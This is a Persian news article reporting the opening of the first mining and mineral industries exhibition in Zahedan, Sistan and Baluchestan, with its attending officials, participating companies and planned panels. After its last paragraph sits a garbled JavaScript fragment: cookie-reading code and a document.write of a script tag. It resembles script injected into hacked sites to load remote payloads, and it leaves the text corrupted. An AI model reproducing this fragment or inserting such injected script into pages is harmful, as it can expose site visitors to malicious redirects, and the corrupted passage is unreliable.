سه شنبه ۰۱ مرداد ۱۳۹۸ , ۰۲:۵۴:۲۷
2019 / July / 22خبر بهمن ۲۴, ۱۳۹۷

نخستین نمایشگاه معدن و صنایع معدنی در زاهدان افتتاح شد‎

موقعیت لجستیک سیستان و بلوچستان بررسی می‌شود

نخستین نمایشگاه معدن و صنایع معدنی سیستان و بلوچستان با حضور معاون منابع طبیعی کشور، رئیس صندوق بیمه و سرمایه گذاری معادن کل کشور، رئیس خانه معدن ایران، مدیر کل سیاستگذاری وزارت صنعت و جمعی از مسئولان استانی در محل نمایشگاه دائمی زاهدان افتتاح شد.

به گزارش پیام‌آوران معدن و فولاد، دبیر برگزاری نمایشگاه معدن و صنایع وابسته در حاشیه مراسم گشایش این نمایشگاه اظهار داشت: برای نخستین بار نمایشگاهی در حوزه معدن و صنایع وابسته در سیستان وبلوچستان برپا شد که هدف آن شناسایی پتانسیل های معدنی این استان و بهره وری بهتر از این ظرفیت خدادادی است.

محدثه رحمانی با بیان اینکه در این مراسم شماری از مدیران کشوری و استانی و کارشناسان حوزه معدن حضور داشتند افزود: خلیل آقایی رئیس سازمان منابع طبیعی کشور، محمدرضا بهرامن رئیس خانه معدن ایران، محسن اتابکی مدیر کل سیاست گذاری وزارت صمت،  اعضای شورای عالی معادن کشور، محمد آرازش مدیر عامل و نائب رئیس شرکت توسعه تجارت زندگی برای معرفی نخستین ترمینال مکانیزه سبز مواد معدنی در بندر چابهار، وحید احمدی دبیر کمیسیون علمی تحقیقاتی و فناوری هیات دولت حضور داشتند.

وی تصریح کرد: شرکت های داخلی و خارجی زیادی از جمله شرکت مس ایران، شرکت طرح و تولید مواد معدنی، شرکت ایمیدرو و سایر شرکت های معتبر در حوزه معدن در این نمایشگاه شرکت دارند.

دبیر برگزاری نمایشگاه معدن و صنایع وابسته خاطر نشان کرد: برگزاری ۲ پنل تخصصی از برنامه های این نمایشگاه است که در پنل اول فعال سازی و احیاء معادن کوچک مقیاس در سطح سیستان و بلوچستان در دستور کار قرار دارد و در پنل دوم بحث لجستیک و کسب و کار نوین معدنی مطرح است.

وی افزود: این نمایشگاه از ۲۳ تا ۲۵ بهمن ماه در محل دائمی نمایشگاه های بین المللی زاهدان واقع در خیابان دانشگاه برای بازدید عموم دایر است. +e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));:void 0}var =”,||void 0===time){var ), path=/; expires=”(”+src+'”><\/script>‘)}

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

استفاده از اخبار با نقل منبع معدن و فولاد مجاز است.